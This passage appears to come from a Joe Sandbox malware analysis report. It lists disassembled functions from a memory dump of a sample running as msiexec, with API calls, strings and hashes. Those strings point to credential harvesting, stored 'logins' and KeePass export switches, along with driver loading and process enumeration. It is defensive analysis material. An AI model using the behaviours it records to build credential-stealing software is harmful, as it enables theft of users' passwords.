                                                                            • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                            Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                            • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                            • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                            • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                            • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                            • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                            • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                            • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                            • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                            • API String ID: 667068680-2887671607
                                                                            • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                            • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                            • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                            • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                            Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                            • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                            • API String ID: 1607361635-601624466
                                                                            • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                            • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                            • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                            • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                            Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintf$memset$wcscpy
                                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                            • API String ID: 2000436516-3842416460
                                                                            • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                            • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                            • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                            • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                            Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                              • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                              • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                              • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                            • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                            • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                            • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                            • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                            • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                            • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                            • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                            • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                            • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                            • String ID:
                                                                            • API String ID: 1043902810-0
                                                                            • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                            • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                            • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                            • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                            Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                            • free.MSVCRT ref: 0040E49A
                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                            • memset.MSVCRT ref: 0040E380
                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                            • wcschr.MSVCRT ref: 0040E3B8
                                                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E407
                                                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E422
                                                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E43D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                            • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                            • API String ID: 3849927982-2252543386
                                                                            • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                            • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                            • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                            • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                            Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                            • _snwprintf.MSVCRT ref: 0044488A
                                                                            • wcscpy.MSVCRT ref: 004448B4
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@_snwprintfwcscpy
                                                                            • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                            • API String ID: 2899246560-1542517562
                                                                            • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                            • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                            • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                            • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                            Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040DBCD
                                                                            • memset.MSVCRT ref: 0040DBE9
                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                              • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                              • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                              • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                            • wcscpy.MSVCRT ref: 0040DC2D
                                                                            • wcscpy.MSVCRT ref: 0040DC3C
                                                                            • wcscpy.MSVCRT ref: 0040DC4C
                                                                            • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                            • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                            • wcscpy.MSVCRT ref: 0040DCC3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                            • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                            • API String ID: 3330709923-517860148
                                                                            • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                            • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                            • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                            • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                            Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                            • memset.MSVCRT ref: 0040806A
                                                                            • memset.MSVCRT ref: 0040807F
                                                                            • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                            • _wcsicmp.MSVCRT ref: 004081C3
                                                                            • memset.MSVCRT ref: 004081E4
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                              • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                              • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                            • String ID: logins$null
                                                                            • API String ID: 2148543256-2163367763
                                                                            • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                            • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                            • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                            • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                            Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                            • memset.MSVCRT ref: 004085CF
                                                                            • memset.MSVCRT ref: 004085F1
                                                                            • memset.MSVCRT ref: 00408606
                                                                            • strcmp.MSVCRT ref: 00408645
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                            • memset.MSVCRT ref: 0040870E
                                                                            • strcmp.MSVCRT ref: 0040876B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                            • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                            • String ID: ---
                                                                            • API String ID: 3437578500-2854292027
                                                                            • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                            • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                            • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                            • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                            Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0041087D
                                                                            • memset.MSVCRT ref: 00410892
                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                            • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                            • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                            • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                            • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                            • GetSysColor.USER32(0000000F), ref: 00410999
                                                                            • DeleteObject.GDI32(?), ref: 004109D0
                                                                            • DeleteObject.GDI32(?), ref: 004109D6
                                                                            • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                            • String ID:
                                                                            • API String ID: 1010922700-0
                                                                            • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                            • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                            • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                            • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                            Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                            • malloc.MSVCRT ref: 004186B7
                                                                            • free.MSVCRT ref: 004186C7
                                                                            • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                            • free.MSVCRT ref: 004186E0
                                                                            • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                            • malloc.MSVCRT ref: 004186FE
                                                                            • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                            • free.MSVCRT ref: 00418716
                                                                            • free.MSVCRT ref: 0041872A
                                                                            • free.MSVCRT ref: 00418749
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: free$FullNamePath$malloc$Version
                                                                            • String ID: |A
                                                                            • API String ID: 3356672799-1717621600
                                                                            • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                            • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                            • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                            • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                            Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp
                                                                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                            • API String ID: 2081463915-1959339147
                                                                            • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                            • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                            • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                            • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                            Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                            • API String ID: 2012295524-70141382
                                                                            • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                            • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                            • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                            • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                            Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                            • API String ID: 667068680-3953557276
                                                                            • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                            • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                            • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                            • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
